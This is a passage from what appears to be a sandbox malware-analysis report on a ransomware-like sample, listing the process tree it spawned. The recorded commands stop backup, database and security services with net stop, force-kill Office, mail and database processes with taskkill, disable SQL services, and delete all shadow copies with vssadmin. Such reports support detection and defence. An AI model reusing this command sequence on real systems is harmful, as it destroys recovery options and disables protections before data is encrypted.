  PID:3668
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:2040
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:4012
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:2376
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:3756
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2364
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:4200
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:3808
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:4316
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:492
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:4212
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:3264
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:4352
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:364
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:4476
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:4120
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:4512
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:4144
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:4580
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:4176
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:4592
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:4296
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:4624
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:4248
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:4564
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:4340
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:4672
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:4632
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:4948
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:4752
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:4992
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:4768
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:5020
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:4800
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:5008
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:4828
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:5068
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:4872
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:4348
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:4900
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:3748
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4936
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:3928
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5116
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:4028
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:4128
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:4664
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:5044
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:8868
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:5000
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:8828
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:5028
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
    3⤵
    PID:7044
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:9140
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:4908
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:8604
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:4880
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:9008
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:5252
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “SQL Backups /y
    3⤵
    PID:12300
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:5548
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:17012
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:6740
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:16328
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:8740
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:13920
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:8500
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:13748
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:8492
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:13852
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:8484
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:13944
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:8448
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:16048
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:8440
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:14340
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:8432
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:16032
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:8420
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:13684
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:8412
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:13936
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:8404
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:13596
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:8396
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:13692
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:8388
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:13780
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:8376
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:16224
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:8368
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:16884
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:8360
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:16368
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:8352
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:16288
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:9520
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:8644
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:8580
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /f
  2⤵
  - Kills process with taskkill
  PID:7096
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:8476
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /f
  2⤵
  PID:10228
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10220
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  PID:10212
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /f
  2⤵
  PID:10204
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /f
  2⤵
  - Kills process with taskkill
  PID:10188
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /f
  2⤵
  - Kills process with taskkill
  PID:10180
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /f
  2⤵
  - Kills process with taskkill
  PID:10172
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /f
  2⤵
  PID:10164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10156
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10148
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /f
  2⤵
  - Kills process with taskkill
  PID:10132
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:10124
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:10116
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:10108
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10092
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /f
  2⤵
  PID:10084
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10076
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:10060
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /f
  2⤵
  - Kills process with taskkill
  PID:10052
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10044
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /f
  2⤵
  PID:10028
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10020
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thunderbird.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10012
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:10004
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM store.exe /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:9988
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wrsa.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9980
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM jetty.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9972
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM hMailServer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9952
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ntrtscan.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9944
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM nservice.exe /f
  2⤵
  PID:9936
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM nslsvice.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9928
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  PID:9912
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9904
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9896
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:9880
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:9872
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:9864
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:9856
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:9848
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:9840
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9832
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9824
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:9816
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9808
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9800
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9792
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9784
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9776
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9768
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9760
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9752
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9744
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9736
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9728
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9720
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9712
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9704
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:9696
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:9688
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9680
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9672
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9664
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9656
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9648
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9640
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9632
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9624
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9616
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:9608
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9600
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9592
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9584
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9576
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9568
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9560
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9552
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9544
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:9536
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:9512
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:9500
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:10944
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:10936
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:10928
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:10920
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:10912
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:10904
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:10896
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:10888
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:10880
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:10872
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:10864
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:10852
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:10840
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:10832
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:9492
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:9324
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop vapiendpoint /y
    3⤵
    PID:17020
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:9316
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
    3⤵
    PID:16680
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:9296
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:16344
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:9288
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:16352
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:9280
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:16216
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:9272
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:16480
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:9264
